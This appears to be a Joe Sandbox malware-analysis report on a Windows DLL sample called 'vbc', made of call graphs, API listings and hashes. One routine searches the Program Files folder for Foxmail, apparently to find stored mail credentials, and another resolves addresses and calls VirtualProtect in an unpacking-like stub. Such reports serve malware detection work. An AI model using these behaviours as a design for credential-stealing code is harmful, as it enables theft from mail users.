7760 100065ba 7759->7760 7761 100085eb 26 API calls 7760->7761 7762 100065e6 7761->7762 7763 100062bc _abort 11 API calls 7762->7763 7764 10006615 ___scrt_fastfail 7763->7764 7765 100066b6 FindFirstFileExA 7764->7765 7766 10006705 7765->7766 7767 10006580 26 API calls 7766->7767 7771 1000853a 7768->7771 7769 1000854f 7770 10006368 __dosmaperr 20 API calls 7769->7770 7772 10008554 7769->7772 7776 1000857a 7770->7776 7771->7769 7771->7772 7774 1000858b 7771->7774 7772->7748 7773 100062ac _abort 26 API calls 7773->7772 7774->7772 7775 10006368 __dosmaperr 20 API calls 7774->7775 7775->7776 7776->7773 7778 100067a4 7777->7778 7779 100067b4 7778->7779 7780 1000571e _free 20 API calls 7778->7780 7781 1000571e _free 20 API calls 7779->7781 7780->7778 7782 100067bb 7781->7782 7782->7745 7327 10009e71 7328 10009e95 7327->7328 7329 10009ee6 7328->7329 7332 10009f71 __startOneArgErrorHandling 7328->7332 7331 10009ef8 7329->7331 7335 1000aa53 7329->7335 7333 1000b2f0 21 API calls 7332->7333 7334 1000acad __startOneArgErrorHandling 7332->7334 7333->7334 7336 1000aa70 RtlDecodePointer 7335->7336 7337 1000aa80 7335->7337 7336->7337 7338 1000ab0d 7337->7338 7341 1000ab02 7337->7341 7343 1000aab7 7337->7343 7338->7341 7342 10006368 __dosmaperr 20 API calls 7338->7342 7339 10002ada _ValidateLocalCookies 5 API calls 7340 1000ac67 7339->7340 7340->7331 7341->7339 7342->7341 7343->7341 7344 10006368 __dosmaperr 20 API calls 7343->7344 7344->7341 7561 10003eb3 7562 10005411 38 API calls 7561->7562 7563 10003ebb 7562->7563 6542 1000543d 6543 10005440 6542->6543 6546 100055a8 6543->6546 6557 10007613 6546->6557 6549 100055c2 IsProcessorFeaturePresent 6551 100055cd 6549->6551 6554 100060e2 _abort 8 API calls 6551->6554 6553 100055b8 6553->6549 6556 100055e0 6553->6556 6554->6556 6587 10004bc1 6556->6587 6590 10007581 6557->6590 6560 1000766e 6561 1000767a _abort 6560->6561 6562 10005b7a _abort 20 API calls 6561->6562 6565 100076a7 _abort 6561->6565 6568 100076a1 _abort 6561->6568 6562->6568 6563 100076f3 6564 10006368 __dosmaperr 20 API calls 6563->6564 6566 100076f8 6564->6566 6572 1000771f 6565->6572 6604 10005671 RtlEnterCriticalSection 6565->6604 6569 100062ac _abort 26 API calls 6566->6569 6568->6563 6568->6565 6586 100076d6 6568->6586 6569->6586 6573 1000777e 6572->6573 6575 10007776 6572->6575 6583 100077a9 6572->6583 6605 100056b9 RtlLeaveCriticalSection 6572->6605 6573->6583 6606 10007665 6573->6606 6578 10004bc1 _abort 28 API calls 6575->6578 6578->6573 6582 10007665 _abort 38 API calls 6582->6583 6609 1000782e 6583->6609 6584 1000780c 6585 10005af6 _abort 38 API calls 6584->6585 6584->6586 6585->6586 6633 1000bdc9 6586->6633 6637 1000499b 6587->6637 6593 10007527 6590->6593 6592 100055ad 6592->6553 6592->6560 6594 10007533 ___scrt_is_nonwritable_in_current_image 6593->6594 6599 10005671 RtlEnterCriticalSection 6594->6599 6596 10007541 6600 10007575 6596->6600 6598 10007568 _abort 6598->6592 6599->6596 6603 100056b9 RtlLeaveCriticalSection 6600->6603 6602 1000757f 6602->6598 6603->6602 6604->6572 6605->6575 6607 10005af6 _abort 38 API calls 6606->6607 6608 1000766a 6607->6608 6608->6582 6610 10007834 6609->6610 6611 100077fd 6609->6611 6636 100056b9 RtlLeaveCriticalSection 6610->6636 6611->6584 6611->6586 6613 10005af6 GetLastError 6611->6613 6614 10005b12 6613->6614 6615 10005b0c 6613->6615 6617 1000637b _abort 20 API calls 6614->6617 6619 10005b61 SetLastError 6614->6619 6616 10005e08 _abort 11 API calls 6615->6616 6616->6614 6618 10005b24 6617->6618 6620 10005b2c 6618->6620 6621 10005e5e _abort 11 API calls 6618->6621 6619->6584 6622 1000571e _free 20 API calls 6620->6622 6623 10005b41 6621->6623 6624 10005b32 6622->6624 6623->6620 6625 10005b48 6623->6625 6627 10005b6d SetLastError 6624->6627 6626 1000593c _abort 20 API calls 6625->6626 6628 10005b53 6626->6628 6629 100055a8 _abort 35 API calls 6627->6629 6630 1000571e _free 20 API calls 6628->6630 6631 10005b79 6629->6631 6632 10005b5a 6630->6632 6632->6619 6632->6627 6634 10002ada _ValidateLocalCookies 5 API calls 6633->6634 6635 1000bdd4 6634->6635 6635->6635 6636->6611 6638 100049a7 _abort 6637->6638 6639 100049bf 6638->6639 6659 10004af5 GetModuleHandleW 6638->6659 6668 10005671 RtlEnterCriticalSection 6639->6668 6643 10004a65 6672 10004aa5 6643->6672 6647 10004a3c 6650 10004a54 6647->6650 6654 10004669 _abort 5 API calls 6647->6654 6648 10004a82 6675 10004ab4 6648->6675 6649 10004aae 6653 1000bdc9 _abort 5 API calls 6649->6653 6655 10004669 _abort 5 API calls 6650->6655 6658 10004ab3 6653->6658 6654->6650 6655->6643 6656 100049c7 6656->6643 6656->6647 6669 1000527a 6656->6669 6660 100049b3 6659->6660 6660->6639 6661 10004b39 GetModuleHandleExW 6660->6661 6662 10004b63 GetProcAddress 6661->6662 6666 10004b78 6661->6666 6662->6666 6663 10004b95 6665 10002ada _ValidateLocalCookies 5 API calls 6663->6665 6664 10004b8c FreeLibrary 6664->6663 6667 10004b9f 6665->6667 6666->6663 6666->6664 6667->6639 6668->6656 6683 10005132 6669->6683 6705 100056b9 RtlLeaveCriticalSection 6672->6705 6674 10004a7e 6674->6648 6674->6649 6706 10006025 6675->6706 6678 10004ae2 6681 10004b39 _abort 8 API calls 6678->6681 6679 10004ac2 GetPEB 6679->6678 6680 10004ad2 GetCurrentProcess TerminateProcess 6679->6680 6680->6678 6682 10004aea ExitProcess 6681->6682 6686 100050e1 6683->6686 6685 10005156 6685->6647 6687 100050ed ___scrt_is_nonwritable_in_current_image 6686->6687 6694 10005671 RtlEnterCriticalSection 6687->6694 6689 100050fb 6695 1000515a 6689->6695 6693 10005119 _abort 6693->6685 6694->6689 6698 1000517a 6695->6698 6699 10005182 6695->6699 6696 10002ada _ValidateLocalCookies 5 API calls 6697 10005108 6696->6697 6701 10005126 6697->6701 6698->6696 6699->6698 6700 1000571e _free 20 API calls 6699->6700 6700->6698 6704 100056b9 RtlLeaveCriticalSection 6701->6704 6703 10005130 6703->6693 6704->6703 6705->6674 6707 10006040 6706->6707 6708 1000604a 6706->6708 6710 10002ada _ValidateLocalCookies 5 API calls 6707->6710 6709 10005c45 _abort 5 API calls 6708->6709 6709->6707 6711 10004abe 6710->6711 6711->6678 6711->6679 6304 10001f3f 6305 10001f4b ___scrt_is_nonwritable_in_current_image 6304->6305 6322 1000247c 6305->6322 6307 10001f52 6308 10002041 6307->6308 6309 10001f7c 6307->6309 6316 10001f57 ___scrt_is_nonwritable_in_current_image 6307->6316 6349 10002639 IsProcessorFeaturePresent 6308->6349 6333 100023de 6309->6333 6312 10002048 6313 10001f8b __RTC_Initialize 6313->6316 6336 100022fc RtlInitializeSListHead 6313->6336 6315 10001f99 ___scrt_initialize_default_local_stdio_options 6337 100046c5 6315->6337 6320 10001fb8 6320->6316 6345 10004669 6320->6345 6323 10002485 6322->6323 6353 10002933 IsProcessorFeaturePresent 6323->6353 6327 10002496 6328 1000249a 6327->6328 6364 100053c8 6327->6364 6328->6307 6331 100024b1 6331->6307 6427 100024b5 6333->6427 6335 100023e5 6335->6313 6336->6315 6340 100046dc 6337->6340 6338 10002ada _ValidateLocalCookies 5 API calls 6339 10001fad 6338->6339 6339->6316 6341 100023b3 6339->6341 6340->6338 6342 100023b8 ___scrt_release_startup_lock 6341->6342 6343 10002933 ___isa_available_init IsProcessorFeaturePresent 6342->6343 6344 100023c1 6342->6344 6343->6344 6344->6320 6346 10004698 6345->6346 6347 10002ada _ValidateLocalCookies 5 API calls 6346->6347 6348 100046c1 6347->6348 6348->6316 6350 1000264e ___scrt_fastfail 6349->6350 6351 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6350->6351 6352 10002744 ___scrt_fastfail 6351->6352 6352->6312 6354 10002491 6353->6354 6355 100034ea 6354->6355 6356 100034ef ___vcrt_initialize_winapi_thunks 6355->6356 6375 10003936 6356->6375 6359 100034fd 6359->6327 6361 10003505 6362 10003510 6361->6362 6389 10003972 6361->6389 6362->6327 6412 10007457 6364->6412 6367 10003529 6368 10003532 6367->6368 6374 10003543 6367->6374 6369 1000391b ___vcrt_uninitialize_ptd 6 API calls 6368->6369 6370 10003537 6369->6370 6371 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6370->6371 6372 1000353c 6371->6372 6423 10003c50 6372->6423 6374->6328 6376 1000393f 6375->6376 6378 10003968 6376->6378 6380 100034f9 6376->6380 6393 10003be0 6376->6393 6379 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6378->6379 6379->6380 6380->6359 6381 100038e8 6380->6381 6398 10003af1 6381->6398 6384 100038fd 6384->6361 6385 10003ba2 ___vcrt_FlsSetValue 6 API calls 6386 1000390b 6385->6386 6387 10003918 6386->6387 6403 1000391b 6386->6403 6387->6361 6390 1000397d 6389->6390 6392 1000399c 6389->6392 6391 10003987 RtlDeleteCriticalSection 6390->6391 6391->6391 6391->6392 6392->6359 6394 10003a82 try_get_function 5 API calls 6393->6394 6395 10003bfa 6394->6395 6396 10003c18 InitializeCriticalSectionAndSpinCount 6395->6396 6397 10003c03 6395->6397 6396->6397 6397->6376 6399 10003a82 try_get_function 5 API calls 6398->6399 6400 10003b0b 6399->6400 6401 10003b24 TlsAlloc 6400->6401 6402 100038f2 6400->6402 6402->6384 6402->6385 6404 10003925 6403->6404 6406 1000392b 6403->6406 6407 10003b2c 6404->6407 6406->6384 6408 10003a82 try_get_function 5 API calls 6407->6408 6409 10003b46 6408->6409 6410 10003b5e TlsFree 6409->6410 6411 10003b52 6409->6411 6410->6411 6411->6406 6413 10007474 6412->6413 6416 10007470 6412->6416 6413->6416 6418 1000731f 6413->6418 6414 10002ada _ValidateLocalCookies 5 API calls 6415 100024a3 6414->6415 6415->6331 6415->6367 6416->6414 6419 10007326 6418->6419 6420 10007369 GetStdHandle 6419->6420 6421 100073d1 6419->6421 6422 1000737c GetFileType 6419->6422 6420->6419 6421->6413 6422->6419 6424 10003c7f 6423->6424 6425 10003c59 6423->6425 6424->6374 6425->6424 6426 10003c69 FreeLibrary 6425->6426 6426->6425 6428 100024c4 6427->6428 6429 100024c8 6427->6429 6428->6335 6430 10002639 ___scrt_fastfail 4 API calls 6429->6430 6432 100024d5 ___scrt_release_startup_lock 6429->6432 6431 10002559 6430->6431 6432->6335 7564 100067bf 7569 100067f4 7564->7569 7567 100067db 7568 1000571e _free 20 API calls 7568->7567 7570 100067cd 7569->7570 7571 10006806 7569->7571 7570->7567 7570->7568 7572 10006836 7571->7572 7573 1000680b 7571->7573 7572->7570 7580 100071d6 7572->7580 7574 1000637b _abort 20 API calls 7573->7574 7576 10006814 7574->7576 7578 1000571e _free 20 API calls 7576->7578 7577 10006851 7579 1000571e _free 20 API calls 7577->7579 7578->7570 7579->7570 7581 100071e1 7580->7581 7582 10007209 7581->7582 7583 100071fa 7581->7583 7584 10007218 7582->7584 7589 10008a98 7582->7589 7585 10006368 __dosmaperr 20 API calls 7583->7585 7596 10008acb 7584->7596 7588 100071ff ___scrt_fastfail 7585->7588 7588->7577 7590 10008aa3 7589->7590 7591 10008ab8 RtlSizeHeap 7589->7591 7592 10006368 __dosmaperr 20 API calls 7590->7592 7591->7584 7593 10008aa8 7592->7593 7594 100062ac _abort 26 API calls 7593->7594 7595 10008ab3 7594->7595 7595->7584 7597 10008ae3 7596->7597 7598 10008ad8 7596->7598 7600 10008aeb 7597->7600 7606 10008af4 _abort 7597->7606 7599 100056d0 21 API calls 7598->7599 7604 10008ae0 7599->7604 7601 1000571e _free 20 API calls 7600->7601 7601->7604 7602 10008af9 7605 10006368 __dosmaperr 20 API calls 7602->7605 7603 10008b1e RtlReAllocateHeap 7603->7604 7603->7606 7604->7588 7605->7604 7606->7602 7606->7603 7607 1000474f _abort 7 API calls 7606->7607 7607->7606 7783 10005bff 7791 10005d5c 7783->7791 7786 10005b7a _abort 20 API calls 7788 10005c1b 7786->7788 7787 10005c28 7788->7787 7789 10005c2b 11 API calls 7788->7789 7790 10005c13 7789->7790 7792 10005c45 _abort 5 API calls 7791->7792 7793 10005d83 7792->7793 7794 10005d9b TlsAlloc 7793->7794 7795 10005d8c 7793->7795 7794->7795 7796 10002ada _ValidateLocalCookies 5 API calls 7795->7796 7797 10005c09 7796->7797 7797->7786 7797->7790

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 100011DB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1083526818-0
                                                                                                                                                                                      • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                      • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                      • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                      • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                        • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                        • Part of subcall function 100010F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                        • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                        • Part of subcall function 100010F1: FindClose.KERNELBASE(00000000), ref: 100011DB
                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                      • API String ID: 672098462-2938083778
                                                                                                                                                                                      • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                      • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                        • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                        • Part of subcall function 1000C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                        • Part of subcall function 1000C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                      • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 82 1000c82f-1000c833 80->82 81->80 83 1000c7c8-1000c7f6 call 1000c7e6 81->83 85 1000c872 call 1000c877 82->85 86 1000c835-1000c83d GetModuleHandleA 82->86 91 1000c7f8 83->91 92 1000c86c-1000c86e 83->92 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->82 93 1000c84e-1000c850 90->93 94 1000c7fa-1000c7fe 91->94 95 1000c85b-1000c85e 91->95 96 1000c870 92->96 97 1000c866-1000c86b 92->97 99 1000c852-1000c854 93->99 100 1000c856-1000c85a 93->100 102 1000c865 94->102 103 1000c800-1000c80b GetProcAddress 94->103 98 1000c85f-1000c860 GetProcAddress 95->98 96->90 97->92 98->102 99->98 100->95 102->97 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                        • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                        • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                      • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                      • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 121 1000c85f-1000c865 GetProcAddress 119->121 120->121 124 1000c866-1000c86e 121->124 126 1000c870 124->126 126->117
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2152742572-0
                                                                                                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                      • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 127 1000731f-10007324 128 10007326-1000733e 127->128 129 10007340-10007344 128->129 130 1000734c-10007355 128->130 129->130 131 10007346-1000734a 129->131 132 10007367 130->132 133 10007357-1000735a 130->133 134 100073c7-100073cb 131->134 137 10007369-10007376 GetStdHandle 132->137 135 10007363-10007365 133->135 136 1000735c-10007361 133->136 134->128 138 100073d1-100073d4 134->138 135->137 136->137 139 10007385 137->139 140 10007378-1000737a 137->140 142 10007387-10007389 139->142 140->139 141 1000737c-10007383 GetFileType 140->141 141->142 143 100073a9-100073bb 142->143 144 1000738b-10007396 142->144 143->134 145 100073bd-100073c0 143->145 146 10007398-1000739c 144->146 147 1000739e-100073a1 144->147 145->134 146->134 147->134 148 100073a3-100073a7 147->148 148->134
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 1000736B
                                                                                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 1000737D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                                      • Opcode ID: 1840a6b79673b13cd3d072b9ddd79dce05a280615f1340ab33f998355891a153
                                                                                                                                                                                      • Instruction ID: e86c036d32a0859c32490e3d1b68e1c75febfc356a3e106fe76682d7938830a3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1840a6b79673b13cd3d072b9ddd79dce05a280615f1340ab33f998355891a153
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B11E731D04B5286F330CA3D8C84616AAD5F7421F0B350729DCBED26F9C738DA82B641
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
